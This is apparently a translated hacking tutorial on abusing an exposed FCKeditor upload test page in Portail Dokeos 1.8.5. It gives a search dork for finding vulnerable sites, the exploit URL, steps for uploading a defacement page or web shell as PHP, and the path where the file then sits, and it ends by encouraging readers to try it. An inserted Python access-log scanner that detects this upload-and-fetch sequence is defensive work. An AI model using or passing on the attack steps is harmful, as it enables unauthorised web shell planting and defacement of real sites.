Deface: Portal Dokeos Upload Vulnerability
The Portail Dokeos vulnerability is a file upload bug that is very similar to the FCK editor one, since both can be used to upload a deface file/shell. Okay, let's get straight to the steps. As usual, we first google for our target using the dork below:
Name: Portal Dokeos Upload File Vulnerability
Dork: "Portail Dokeos 1.8.5"
Exploit: http://target.com/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
All set? Then let's head straight to our target. Once on the target site's upload page, first change 'Select the "File Uploader" to use:' from asp to php. After that, just upload our favorite deface file/shell.
Example live targets:
After a successful upload, we can view our uploaded deface file at the following URL (nama_file_anda stands for your file name):
http://target.com/patch/main/upload/nama_file_anda
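For a site owner, the request sequence described above (the uploader test page, an upload, then a fetch from /main/upload/) shows up in the web server access log. The following Python scanner is an added example, not part of the original post: it flags that sequence in Combined Log Format lines. The script-extension list, the connector file name used in the sample, and the sample log lines themselves are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Paths from the post; the install prefix before /main/ varies per site.
TEST_PAGE = re.compile(r"/main/inc/lib/fckeditor/editor/filemanager/upload/test\.html", re.I)
UPLOADER = re.compile(r"/main/inc/lib/fckeditor/editor/filemanager/upload/", re.I)
# Assumption: extensions the server would execute; match them to your handler config.
SCRIPT_IN_UPLOADS = re.compile(r"/main/upload/[^?\s]*\.(?:php\d?|phtml|phar|asp|aspx)(?:[/?]|$)", re.I)
# Combined Log Format: ip ident user [time] "METHOD path proto" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3})')

def classify(method, path):
    """Return which stage of the described upload abuse a request matches, or None."""
    if TEST_PAGE.search(path):
        return "test_page"
    if method == "POST" and UPLOADER.search(path):
        return "upload_post"
    if SCRIPT_IN_UPLOADS.search(path):
        return "script_fetch"
    return None

def scan(lines):
    """Group matching requests per client IP as (stage, status, path) tuples."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        stage = classify(m.group(2), m.group(3)) if m else None
        if stage:
            hits[m.group(1)].append((stage, int(m.group(4)), m.group(3)))
    return dict(hits)

def high_confidence(hits):
    """IPs that POSTed to the uploader, then got a 200 for a script under /main/upload/."""
    out = []
    for ip, events in hits.items():
        stages = [e[0] for e in events]
        if "upload_post" in stages:
            later = events[stages.index("upload_post"):]
            if any(s == "script_fetch" and code == 200 for s, code, _ in later):
                out.append(ip)
    return sorted(out)

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2012:21:14:02 +0700] "GET /main/inc/lib/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 200 2310',
    '203.0.113.7 - - [10/Oct/2012:21:14:40 +0700] "POST /main/inc/lib/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 200 187',
    '203.0.113.7 - - [10/Oct/2012:21:15:05 +0700] "GET /main/upload/x.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Oct/2012:22:01:00 +0700] "GET /main/inc/lib/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 404 210',
]
```

A 404 on the test page, as for the last sample client, means the probe hit a host where the file is already gone; any 200 there means the uploader test page is still deployed and should be removed or access-restricted.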
Okay, that's all for this tutorial. Good night and happy trying.